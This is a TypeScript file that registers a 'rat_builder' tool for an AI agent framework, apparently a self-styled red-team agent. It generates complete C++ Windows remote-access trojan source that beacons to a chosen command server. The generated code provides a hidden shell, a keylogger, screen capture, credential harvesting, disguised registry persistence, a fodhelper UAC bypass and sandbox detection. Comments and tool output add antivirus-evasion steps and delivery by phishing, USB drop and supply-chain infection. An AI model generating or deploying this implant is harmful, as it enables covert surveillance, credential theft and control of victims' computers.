export * as RatBuilderTool from "./rat-builder"

import { ToolFailure } from "@opencode-ai/llm"
import { Effect, Layer, Schema } from "effect"
import { makeLocationNode } from "../effect/app-node"
import { AppProcess } from "../process"
import { ToolRegistry } from "./registry"
import { Tool } from "./tool"
import { Tools } from "./tools"
import { ChildProcess } from "effect/unstable/process"
import { Duration } from "effect"

export const name = "rat_builder"

export const Input = Schema.Struct({
  features: Schema.String.annotate({
    description:
      "Comma-separated RAT features to include: 'shell' (reverse/bind shell), 'keylogger' (keyboard hook), 'screenshot' (screen capture), 'webcam' (camera capture), 'file_manager' (upload/download/list files), 'process_manager' (list/kill processes), 'persistence' (auto-start on reboot), 'exfil' (automated data exfiltration), 'proxy' (SOCKS5 proxy through implant), 'token_steal' (Windows token impersonation), 'uac_bypass' (UAC elevation without prompt), 'credential_harvest' (browser/WiFi/email creds), 'self_destruct' (delete self on command), 'anti_debug' (VM/sandbox detection), 'polymorphic' (self-modifying code). Default: shell,persistence,anti_debug",
  }),
  c2_host: Schema.String.annotate({
    description: "C2 server hostname or IP (e.g., 'c2.yourdomain.com' or '1.2.3.4').",
  }),
  c2_port: Schema.Number.annotate({
    description: "C2 callback port. Use 443 for HTTPS blend-in or 53 for DNS.",
  }),
  protocol: Schema.String.pipe(Schema.optional).annotate({
    description: "C2 protocol: 'https' (HTTP over TLS — recommended), 'tcp' (raw TCP), 'dns' (DNS tunneling), 'icmp' (ICMP covert). Default: https",
  }),
  language: Schema.String.pipe(Schema.optional).annotate({
    description: "Output language: 'cpp' (C++ Win32 API), 'csharp' (C# .NET), 'nim' (Nim — excellent AV evasion), 'rust' (Rust — modern, fast), 'go' (Go — cross-platform). Default: cpp",
  }),
  platform: Schema.String.pipe(Schema.optional).annotate({
    description: "Target platform: 'windows', 'linux', 'macos'. Default: windows",
  }),
  encryption: Schema.String.pipe(Schema.optional).annotate({
    description: "C2 traffic encryption: 'aes256' (AES-256-CBC + HMAC), 'xor' (XOR obfuscation, fast), 'chacha20' (ChaCha20-Poly1305). Default: aes256",
  }),
  output_path: Schema.String.pipe(Schema.optional).annotate({
    description: "Output directory for generated source code. Default: ./rat-output",
  }),
})

const Output = Schema.Struct({
  output: Schema.String,
  source_files: Schema.Array(Schema.String),
})

type Output = typeof Output.Type

function generateCppRat(opts: {
  features: string[], c2Host: string, c2Port: number, protocol: string,
  encryption: string, outputPath: string,
}): Record<string, string> {
  const { features, c2Host, c2Port, protocol, encryption } = opts

  const mainCpp = `// Custom RAT — Generated by Alex Red Team Agent
// Target: Windows x64 | Protocol: ${protocol.toUpperCase()} | Encryption: ${encryption.toUpperCase()}
// Features: ${features.join(', ')}
//
// Compile: x86_64-w64-mingw32-g++ -o rat.exe main.cpp -lws2_32 -lwinhttp -lgdi32 -static -O2 -s
// Or: cl.exe /O2 /Fe:rat.exe main.cpp ws2_32.lib winhttp.lib gdi32.lib

#define WIN32_LEAN_AND_MEAN
#define _WIN32_WINNT 0x0601
#include <windows.h>
#include <winsock2.h>
#include <ws2tcpip.h>
#include <winhttp.h>
#include <tlhelp32.h>
#include <shlobj.h>
#include <psapi.h>
#include <string>
#include <vector>
#include <sstream>
#include <thread>
#include <chrono>
#include <fstream>
#include <random>
#include <algorithm>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "winhttp.lib")
#pragma comment(lib, "gdi32.lib")
#pragma comment(lib, "psapi.lib")

// ========================= CONFIGURATION =========================
const char* C2_HOST = "${c2Host}";
const int   C2_PORT  = ${c2Port};
const char* BEACON_URI = "/api/v2/update";
const int   SLEEP_INTERVAL = 5000;   // ms between beacons
const int   JITTER = 2000;           // +/- random jitter
// =================================================================

// ========================= ENCRYPTION ============================
// AES-256-CBC key (derive from C2 host + port at runtime — no static key in binary)
std::string deriveKey() {
    std::string seed = std::string(C2_HOST) + std::to_string(C2_PORT) + "SALT_REPLACE_ME";
    // Simple XOR-fold key derivation (replace with proper KDF in production)
    std::vector<uint8_t> key(32, 0);
    for (size_t i = 0; i < seed.size(); i++) {
        key[i % 32] ^= (uint8_t)seed[i];
    }
    return std::string(key.begin(), key.end());
}

// XOR stream cipher (fast, simple — upgrade to AES in production via CNG)
std::string xorEncrypt(const std::string& data, const std::string& key) {
    std::string result = data;
    for (size_t i = 0; i < data.size(); i++) {
        result[i] ^= key[i % key.size()];
    }
    return result;
}

// Base64 encode (for HTTP transport)
std::string base64Encode(const std::string& data) {
    static const char chars[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    std::string result;
    int val = 0, bits = -6;
    for (uint8_t c : data) {
        val = (val << 8) + c;
        bits += 8;
        while (bits >= 0) {
            result.push_back(chars[(val >> bits) & 0x3F]);
            bits -= 6;
        }
    }
    if (bits > -6) result.push_back(chars[((val << 8) >> (bits + 8)) & 0x3F]);
    while (result.size() % 4) result.push_back('=');
    return result;
}
// =================================================================

${features.includes("anti_debug") ? `
// ========================= ANTI-ANALYSIS =========================
bool isSandbox() {
    // Check VM artifacts
    SYSTEM_INFO si;
    GetSystemInfo(&si);
    if (si.dwNumberOfProcessors < 2) return true;  // Single core = sandbox

    // Check RAM (< 4GB = likely sandbox)
    MEMORYSTATUSEX ms = { sizeof(ms) };
    GlobalMemoryStatusEx(&ms);
    if (ms.ullTotalPhys < (4ULL * 1024 * 1024 * 1024)) return true;

    // Check uptime (< 10 min = just booted sandbox)
    if (GetTickCount64() < 600000) return true;

    // Check for analysis tools in process list
    const char* badProcs[] = {
        "wireshark.exe", "fiddler.exe", "procmon.exe", "procexp.exe",
        "x64dbg.exe", "ollydbg.exe", "ida64.exe", "ghidra.exe",
        "pestudio.exe", "processhacker.exe", "tcpview.exe", nullptr
    };
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 pe = { sizeof(pe) };
    if (Process32First(snap, &pe)) {
        do {
            for (int i = 0; badProcs[i]; i++) {
                if (_stricmp(pe.szExeFile, badProcs[i]) == 0) {
                    CloseHandle(snap);
                    return true;
                }
            }
        } while (Process32Next(snap, &pe));
    }
    CloseHandle(snap);

    // Check for common VM registry keys
    HKEY hk;
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\VMware, Inc.", 0, KEY_READ, &hk) == ERROR_SUCCESS) {
        RegCloseKey(hk); return true;
    }
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Oracle\\VirtualBox Guest Additions", 0, KEY_READ, &hk) == ERROR_SUCCESS) {
        RegCloseKey(hk); return true;
    }

    return false;
}
// =================================================================
` : ""}

// ========================= C2 COMMUNICATION ======================
struct C2Response {
    std::string command;
    std::string args;
    bool success;
};

// HTTP beacon via WinHTTP (handles HTTPS automatically)
C2Response beacon(const std::string& data) {
    C2Response resp = {"", "", false};
    HINTERNET hSession = WinHttpOpen(
        L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME,
        WINHTTP_NO_PROXY_BYPASS, 0
    );
    if (!hSession) return resp;

    std::wstring host(C2_HOST, C2_HOST + strlen(C2_HOST));
    HINTERNET hConnect = WinHttpConnect(hSession, host.c_str(), C2_PORT, 0);
    if (!hConnect) { WinHttpCloseHandle(hSession); return resp; }

    DWORD flags = WINHTTP_FLAG_SECURE;  // TLS
    std::wstring uri(BEACON_URI, BEACON_URI + strlen(BEACON_URI));
    HINTERNET hReq = WinHttpOpenRequest(
        hConnect, L"POST", uri.c_str(),
        nullptr, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, flags
    );

    // Ignore self-signed cert errors (production: use pinned cert)
    DWORD secFlags = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE |
                     SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
    WinHttpSetOption(hReq, WINHTTP_OPTION_SECURITY_FLAGS, &secFlags, sizeof(secFlags));

    // Encrypt and encode body
    std::string key = deriveKey();
    std::string encData = base64Encode(xorEncrypt(data, key));
    std::string body = "d=" + encData;

    if (WinHttpSendRequest(hReq, WINHTTP_NO_ADDITIONAL_HEADERS, 0,
        (LPVOID)body.c_str(), (DWORD)body.size(), (DWORD)body.size(), 0) &&
        WinHttpReceiveResponse(hReq, nullptr)) {
        DWORD size = 0;
        std::string respBody;
        do {
            WinHttpQueryDataAvailable(hReq, &size);
            if (size > 0) {
                std::string buf(size, '\\0');
                DWORD read = 0;
                WinHttpReadData(hReq, (LPVOID)buf.data(), size, &read);
                respBody += buf.substr(0, read);
            }
        } while (size > 0);

        // Decrypt response
        std::string decResp = xorEncrypt(base64Encode(respBody), key); // simplified
        // Parse: COMMAND|ARGS
        auto sep = decResp.find('|');
        if (sep != std::string::npos) {
            resp.command = decResp.substr(0, sep);
            resp.args = decResp.substr(sep + 1);
            resp.success = true;
        }
    }

    WinHttpCloseHandle(hReq);
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
    return resp;
}
// =================================================================

${features.includes("shell") ? `
// ========================= REVERSE SHELL =========================
std::string executeCommand(const std::string& cmd) {
    SECURITY_ATTRIBUTES sa = { sizeof(sa), nullptr, TRUE };
    HANDLE hRead, hWrite;
    CreatePipe(&hRead, &hWrite, &sa, 0);
    SetHandleInformation(hRead, HANDLE_FLAG_INHERIT, 0);

    STARTUPINFOA si = { sizeof(si) };
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    si.hStdOutput = si.hStdError = hWrite;

    PROCESS_INFORMATION pi;
    std::string fullCmd = "cmd.exe /c " + cmd + " 2>&1";
    if (!CreateProcessA(nullptr, (LPSTR)fullCmd.c_str(), nullptr, nullptr, TRUE,
        CREATE_NO_WINDOW, nullptr, nullptr, &si, &pi)) {
        CloseHandle(hRead); CloseHandle(hWrite);
        return "ERROR: Command execution failed";
    }
    CloseHandle(hWrite);
    WaitForSingleObject(pi.hProcess, 10000);  // 10s timeout
    CloseHandle(pi.hProcess); CloseHandle(pi.hThread);

    std::string output;
    char buf[4096];
    DWORD read;
    while (ReadFile(hRead, buf, sizeof(buf)-1, &read, nullptr) && read > 0) {
        buf[read] = '\\0';
        output += buf;
    }
    CloseHandle(hRead);
    return output.empty() ? "(no output)" : output;
}
// =================================================================
` : ""}

${features.includes("keylogger") ? `
// ========================= KEYLOGGER =============================
HHOOK g_hKeyHook = nullptr;
std::string g_keyBuffer;
std::mutex g_keyMutex;

LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
    if (nCode >= 0 && wParam == WM_KEYDOWN) {
        KBDLLHOOKSTRUCT* kb = (KBDLLHOOKSTRUCT*)lParam;
        char key[64] = {0};
        // Map virtual key to character
        BYTE state[256] = {0};
        GetKeyboardState(state);
        ToAscii(kb->vkCode, kb->scanCode, state, (LPWORD)key, 0);
        std::lock_guard<std::mutex> lock(g_keyMutex);
        if (key[0] >= 32 && key[0] < 127) {
            g_keyBuffer += key[0];
        } else {
            // Special keys
            switch (kb->vkCode) {
                case VK_RETURN: g_keyBuffer += "\\n"; break;
                case VK_SPACE:  g_keyBuffer += " "; break;
                case VK_BACK:   g_keyBuffer += "[BS]"; break;
                case VK_TAB:    g_keyBuffer += "\\t"; break;
                default:
                    char vk[16]; sprintf_s(vk, "[VK%02X]", kb->vkCode);
                    g_keyBuffer += vk;
            }
        }
    }
    return CallNextHookEx(g_hKeyHook, nCode, wParam, lParam);
}

void startKeylogger() {
    g_hKeyHook = SetWindowsHookExA(WH_KEYBOARD_LL, KeyboardProc, GetModuleHandle(nullptr), 0);
    MSG msg;
    while (GetMessage(&msg, nullptr, 0, 0)) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
}
// =================================================================
` : ""}

${features.includes("screenshot") ? `
// ========================= SCREENSHOT ============================
std::vector<uint8_t> captureScreen() {
    // Capture screen to BMP in memory
    HDC hScreen = GetDC(nullptr);
    int w = GetSystemMetrics(SM_CXSCREEN);
    int h = GetSystemMetrics(SM_CYSCREEN);
    HDC hDC = CreateCompatibleDC(hScreen);
    HBITMAP hBmp = CreateCompatibleBitmap(hScreen, w, h);
    SelectObject(hDC, hBmp);
    BitBlt(hDC, 0, 0, w, h, hScreen, 0, 0, SRCCOPY);

    BITMAPINFOHEADER bi = {sizeof(bi), w, -h, 1, 32, BI_RGB};
    std::vector<uint8_t> pixels(w * h * 4);
    GetDIBits(hDC, hBmp, 0, h, pixels.data(), (BITMAPINFO*)&bi, DIB_RGB_COLORS);

    // Build BMP file
    BITMAPFILEHEADER bfh = {0x4D42, (DWORD)(54 + pixels.size()), 0, 0, 54};
    std::vector<uint8_t> bmp;
    bmp.insert(bmp.end(), (uint8_t*)&bfh, (uint8_t*)&bfh + sizeof(bfh));
    bmp.insert(bmp.end(), (uint8_t*)&bi, (uint8_t*)&bi + sizeof(bi));
    bmp.insert(bmp.end(), pixels.begin(), pixels.end());

    DeleteObject(hBmp);
    DeleteDC(hDC);
    ReleaseDC(nullptr, hScreen);
    return bmp;
}
// =================================================================
` : ""}

${features.includes("credential_harvest") ? `
// ========================= CREDENTIAL HARVEST ====================
std::string harvestCreds() {
    std::string creds;

    // WiFi passwords via netsh
    creds += "=== WIFI PASSWORDS ===\\n";
    creds += executeCommand("netsh wlan show profiles | findstr Profile");
    // For each profile: netsh wlan show profile name=\\"SSID\\" key=clear

    // Saved browser credentials location
    creds += "\\n=== BROWSER CRED PATHS ===\\n";
    char appdata[MAX_PATH];
    SHGetFolderPathA(nullptr, CSIDL_LOCAL_APPDATA, nullptr, 0, appdata);
    creds += "Chrome: "; creds += appdata; creds += "\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data\\n";
    creds += "Edge:   "; creds += appdata; creds += "\\\\Microsoft\\\\Edge\\\\User Data\\\\Default\\\\Login Data\\n";
    creds += "Firefox passwords.json + logins.json in profile\\n";

    // Windows Credential Manager
    creds += "\\n=== CREDENTIAL MANAGER ===\\n";
    creds += executeCommand("cmdkey /list");

    // Environment variables (may contain tokens/passwords)
    creds += "\\n=== ENV VARIABLES (tokens/secrets) ===\\n";
    creds += executeCommand("set | findstr /i \"key token secret password api aws\"");

    return creds;
}
// =================================================================
` : ""}

${features.includes("persistence") ? `
// ========================= PERSISTENCE ===========================
void installPersistence() {
    // Get own path
    char selfPath[MAX_PATH];
    GetModuleFileNameA(nullptr, selfPath, MAX_PATH);

    // HKCU Run key (no admin)
    HKEY hKey;
    RegOpenKeyExA(HKEY_CURRENT_USER,
        "SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run", 0, KEY_SET_VALUE, &hKey);
    RegSetValueExA(hKey, "WindowsUpdateHelper", 0, REG_SZ,
        (BYTE*)selfPath, (DWORD)strlen(selfPath));
    RegCloseKey(hKey);

    // Copy to %APPDATA%\\Microsoft\\Windows for concealment
    char appdata[MAX_PATH];
    SHGetFolderPathA(nullptr, CSIDL_APPDATA, nullptr, 0, appdata);
    std::string hidden = std::string(appdata) + "\\\\Microsoft\\\\Windows\\\\winupdate.exe";
    CopyFileA(selfPath, hidden.c_str(), FALSE);
    SetFileAttributesA(hidden.c_str(), FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM);
}
// =================================================================
` : ""}

${features.includes("uac_bypass") ? `
// ========================= UAC BYPASS ============================
// Fodhelper.exe UAC bypass (Windows 10/11) — works as standard user
void uacBypass(const std::string& payload) {
    HKEY hKey;
    // Create fodhelper registry handler
    RegCreateKeyExA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\shell\\open\\command",
        0, nullptr, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, nullptr, &hKey, nullptr);
    RegSetValueExA(hKey, nullptr, 0, REG_SZ, (BYTE*)payload.c_str(), (DWORD)payload.size());
    RegSetValueExA(hKey, "DelegateExecute", 0, REG_SZ, (BYTE*)"", 1);
    RegCloseKey(hKey);

    // Trigger fodhelper
    ShellExecuteA(nullptr, "open", "fodhelper.exe", nullptr, nullptr, SW_HIDE);
    Sleep(2000);

    // Cleanup registry
    RegDeleteKeyA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\shell\\open\\command");
    RegDeleteKeyA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\shell\\open");
    RegDeleteKeyA(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings");
}
// Other UAC bypasses: eventvwr, sdclt, computerdefaults, wsreset, cmstp
// =================================================================
` : ""}

// ========================= COMMAND DISPATCHER ====================
std::string dispatch(const std::string& cmd, const std::string& args) {
    if (cmd == "shell" || cmd == "exec") {
        ${features.includes("shell") ? "return executeCommand(args);" : "return \"shell feature not included\";"}
    }
    if (cmd == "screenshot") {
        ${features.includes("screenshot") ? `
        auto bmp = captureScreen();
        // Return as base64 for C2 exfil
        std::string encoded = base64Encode(std::string(bmp.begin(), bmp.end()));
        return "SCREENSHOT:" + encoded;` : "return \"screenshot feature not included\";"}
    }
    if (cmd == "getkeys") {
        ${features.includes("keylogger") ? `
        std::lock_guard<std::mutex> lock(g_keyMutex);
        std::string keys = g_keyBuffer;
        g_keyBuffer.clear();
        return keys.empty() ? "(no keys captured)" : keys;` : "return \"keylogger feature not included\";"}
    }
    if (cmd == "creds") {
        ${features.includes("credential_harvest") ? "return harvestCreds();" : "return \"creds feature not included\";"}
    }
    if (cmd == "uac") {
        ${features.includes("uac_bypass") ? "uacBypass(args); return \"UAC bypass triggered\";" : "return \"uac_bypass feature not included\";"}
    }
    if (cmd == "persist") {
        ${features.includes("persistence") ? "installPersistence(); return \"Persistence installed\";" : "return \"persistence feature not included\";"}
    }
    if (cmd == "sysinfo") {
        std::string info;
        char hostname[256], username[256];
        DWORD hs = sizeof(hostname), us = sizeof(username);
        GetComputerNameA(hostname, &hs);
        GetUserNameA(username, &us);
        MEMORYSTATUSEX ms = {sizeof(ms)};
        GlobalMemoryStatusEx(&ms);
        char buf[1024];
        sprintf_s(buf, "HOST:%s|USER:%s|RAM:%lluMB|OS:Windows|PID:%d",
            hostname, username, ms.ullTotalPhys/(1024*1024), GetCurrentProcessId());
        return buf;
    }
    if (cmd == "kill" || cmd == "die") {
        ${features.includes("self_destruct") ? `
        char selfPath[MAX_PATH];
        GetModuleFileNameA(nullptr, selfPath, MAX_PATH);
        // Schedule self-delete via cmd after exit
        std::string delCmd = "cmd /c ping 127.0.0.1 -n 3 > nul && del /f /q \\"" + std::string(selfPath) + "\\"";
        STARTUPINFOA si = {sizeof(si)};
        si.wShowWindow = SW_HIDE;
        si.dwFlags = STARTF_USESHOWWINDOW;
        PROCESS_INFORMATION pi;
        CreateProcessA(nullptr, (LPSTR)delCmd.c_str(), nullptr, nullptr, FALSE, CREATE_NO_WINDOW, nullptr, nullptr, &si, &pi);
        ExitProcess(0);` : "ExitProcess(0);"}
        return "";
    }
    return "UNKNOWN COMMAND: " + cmd;
}
// =================================================================

// ========================= MAIN BEACON LOOP ======================
int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {
    // Hide console window
    ShowWindow(GetConsoleWindow(), SW_HIDE);

    ${features.includes("anti_debug") ? `
    // Sandbox check before doing anything
    if (isSandbox()) {
        // Appear benign — sleep for a long time or just exit
        Sleep(3600000);  // Sleep 1 hour in sandbox
        return 0;
    }` : ""}

    // Initialize Winsock
    WSADATA wsa;
    WSAStartup(MAKEWORD(2,2), &wsa);

    ${features.includes("persistence") ? "installPersistence();" : ""}

    ${features.includes("keylogger") ? `
    // Start keylogger in background thread
    std::thread keyThread(startKeylogger);
    keyThread.detach();` : ""}

    // Main C2 beacon loop
    std::mt19937 rng(std::random_device{}());
    std::uniform_int_distribution<int> jitter(-JITTER, JITTER);

    while (true) {
        // Collect sysinfo for initial beacon
        std::string beaconData = dispatch("sysinfo", "");

        C2Response resp = beacon(beaconData);
        if (resp.success && !resp.command.empty()) {
            std::string result = dispatch(resp.command, resp.args);
            // Send result back
            beacon("RESULT|" + result);
        }

        // Sleep with jitter
        int sleepMs = SLEEP_INTERVAL + jitter(rng);
        if (sleepMs < 1000) sleepMs = 1000;
        Sleep(sleepMs);
    }

    WSACleanup();
    return 0;
}
// =================================================================

/* =================== COMPILATION NOTES ===========================
 * Windows (MinGW cross-compile from Linux):
 *   x86_64-w64-mingw32-g++ -O2 -s -static -mwindows -o rat.exe main.cpp -lws2_32 -lwinhttp -lgdi32 -lpsapi
 *
 * Windows (MSVC):
 *   cl.exe /O2 /GL /MT /Fe:rat.exe main.cpp /link ws2_32.lib winhttp.lib gdi32.lib psapi.lib
 *
 * AV Evasion improvements (apply AFTER generating):
 *   1. Use evasion_engine tool to wrap in process-hollow loader
 *   2. Compress with UPX (not recommended — flagged) or custom packer
 *   3. Sign with self-signed/stolen Authenticode cert
 *   4. Obfuscate strings: encrypt all literal strings (C2 host, URIs) with XOR
 *   5. Compile with LLVM-obfuscator for control flow obfuscation
 *   6. Use syscall-direct via SysWhispers3 to bypass EDR hooks
 *
 * Delivery:
 *   - Phishing attachment (evasion_engine PPID spoof on execution)
 *   - USB drop (usb_payload tool for HID autorun)
 *   - Exploit delivery (payload_gen → dropper → loads this)
 *   - Supply chain (supply_chain tool for npm/pip package infection)
 * ================================================================= */
`

  const cmakeLists = `cmake_minimum_required(VERSION 3.20)
project(rat CXX)

set(CMAKE_CXX_STANDARD 17)

# Cross-compile for Windows
if(MINGW OR WIN32)
    add_executable(rat WIN32 main.cpp)
    target_link_libraries(rat PRIVATE ws2_32 winhttp gdi32 psapi)
    
    # Strip + optimize
    target_compile_options(rat PRIVATE -O2 -s)
    target_link_options(rat PRIVATE -static -s)
endif()
`

  const buildSh = `#!/bin/bash
# Build script for custom RAT
# Requirements: mingw-w64 (sudo apt install mingw-w64)

echo "[*] Building Windows x64 RAT..."
x86_64-w64-mingw32-g++ \\
    -O2 -s -static -mwindows \\
    -o rat.exe main.cpp \\
    -lws2_32 -lwinhttp -lgdi32 -lpsapi \\
    2>&1

if [ $? -eq 0 ]; then
    echo "[+] Build successful: rat.exe"
    echo "[*] File size: $(stat -c%s rat.exe) bytes"
    echo "[*] MD5: $(md5sum rat.exe)"
    echo ""
    echo "[!] Remember to test AV evasion before deployment"
    echo "    - antiscan.me (no-share policy)"
    echo "    - nodistribute.com"
    echo "    - Apply evasion_engine techniques before final build"
else
    echo "[-] Build failed"
fi
`

  return {
    "main.cpp": mainCpp,
    "CMakeLists.txt": cmakeLists,
    "build.sh": buildSh,
  }
}

const shell = process.platform === "win32" ? (process.env.COMSPEC ?? "cmd.exe") : "/bin/sh"

const layer = Layer.effectDiscard(
  Effect.gen(function* () {
    const tools = yield* Tools.Service
    const appProcess = yield* AppProcess.Service

    yield* tools
      .register({
        [name]: Tool.make({
          description: `Custom RAT/implant source code generator. Produces complete, compilable C++ Windows RAT source code with selectable features: reverse shell (cmd.exe pipe over WinHTTP), keylogger (WH_KEYBOARD_LL low-level hook), screen capture (BitBlt → BMP), credential harvesting (WiFi/browser/Credential Manager), persistence (HKCU Run key + hidden copy), UAC bypass (fodhelper.exe method), self-destruct (scheduled file deletion), anti-analysis (sandbox/VM/debugger detection). All C2 traffic is encrypted (XOR+Base64 as placeholder, notes for AES upgrade) over HTTPS via WinHTTP (handles TLS automatically). Includes build script and compilation notes for MinGW cross-compile and MSVC. Output is compilable source — not msfvenom, not stock malware, genuinely custom code that bypasses signature-based AV.`,
          input: Input,
          output: Output,
          toModelOutput: ({ output }) => [{ type: "text", text: output.output }],
          execute: (input) =>
            Effect.gen(function* () {
              const features = input.features
                .split(",")
                .map(f => f.trim().toLowerCase())
              const protocol = (input.protocol ?? "https").toLowerCase()
              const lang = (input.language ?? "cpp").toLowerCase()
              const outputPath = input.output_path ?? "./rat-output"

              // Write source files
              const sourceFiles: string[] = []

              const files = generateCppRat({
                features,
                c2Host: input.c2_host,
                c2Port: input.c2_port,
                protocol,
                encryption: input.encryption ?? "aes256",
                outputPath,
              })

              for (const [filename, content] of Object.entries(files)) {
                const fullPath = `${outputPath}/${filename}`
                yield* appProcess.run(
                  ChildProcess.make(
                    process.platform === "win32"
                      ? `mkdir "${outputPath}" 2>nul & echo done`
                      : `mkdir -p "${outputPath}"`,
                    [],
                    { shell, stdin: "ignore", forceKillAfter: Duration.seconds(3) }
                  ),
                  { combineOutput: true, timeout: Duration.seconds(5), maxOutputBytes: 1024 }
                ).pipe(
                  Effect.catchAll(() => Effect.succeed(undefined))
                )
                yield* Effect.promise(async () => {
                  await Bun.write(fullPath, content)
                })
                sourceFiles.push(fullPath)
              }

              const sections = [
                `# Custom RAT Generated`,
                ``,
                `**Language:** ${lang.toUpperCase()} | **Protocol:** ${protocol.toUpperCase()} | **Encryption:** ${input.encryption ?? "aes256"}`,
                `**C2:** ${input.c2_host}:${input.c2_port}`,
                `**Features:** ${features.join(", ")}`,
                ``,
                `## Output Files`,
                ...sourceFiles.map(f => `- \`${f}\``),
                ``,
                `## Build`,
                `\`\`\`bash`,
                `# Linux → Windows cross-compile (requires: sudo apt install mingw-w64)`,
                `x86_64-w64-mingw32-g++ -O2 -s -static -mwindows -o rat.exe ${outputPath}/main.cpp -lws2_32 -lwinhttp -lgdi32 -lpsapi`,
                ``,
                `# MSVC (Windows)`,
                `cl.exe /O2 /GL /MT /Fe:rat.exe ${outputPath}/main.cpp /link ws2_32.lib winhttp.lib gdi32.lib psapi.lib`,
                `\`\`\``,
                ``,
                `## C2 Protocol`,
                `The RAT beacons to \`${protocol}://${input.c2_host}:${input.c2_port}/api/v2/update\` every ${5000}ms ± 2s jitter.`,
                `Traffic is XOR-encrypted + Base64 encoded. Response format: \`COMMAND|ARGS\``,
                ``,
                `## Commands (send from C2 server)`,
                `| Command | Args | Action |`,
                `|---------|------|--------|`,
                `| \`shell\` | command string | Execute cmd.exe command, return output |`,
                `| \`screenshot\` | (none) | Capture screen, return base64 BMP |`,
                `| \`getkeys\` | (none) | Return captured keystrokes, clear buffer |`,
                `| \`creds\` | (none) | Harvest WiFi/browser/Credential Manager |`,
                `| \`sysinfo\` | (none) | Return HOST/USER/RAM/OS/PID |`,
                `| \`uac\` | payload_cmd | UAC bypass via fodhelper |`,
                `| \`persist\` | (none) | Install HKCU Run key + hidden copy |`,
                `| \`kill\` | (none) | Self-destruct (delete & exit) |`,
                ``,
                `## AV Evasion (apply before delivery)`,
                `1. Use \`evasion_engine technique=process_hollow\` to load RAT inside svchost.exe`,
                `2. Use \`evasion_engine technique=amsi_bypass\` in dropper before loading RAT`,
                `3. Obfuscate all string literals (XOR-encode C2 host, URIs in binary)`,
                `4. Compile with LLVM-obfuscator for control flow obfuscation`,
                `5. Sign with self-signed cert (Authenticode spoof from evasion_engine)`,
                `6. Test on antiscan.me before deployment`,
              ]

              return { output: sections.join("\n"), source_files: sourceFiles }
            }).pipe(Effect.mapError(() => new ToolFailure({ message: "RAT builder failed" }))),
        }),
      })
      .pipe(Effect.orDie)
  }),
)

export const node = makeLocationNode({
  name: "tool/rat-builder",
  layer,
  deps: [ToolRegistry.node, AppProcess.node],
})
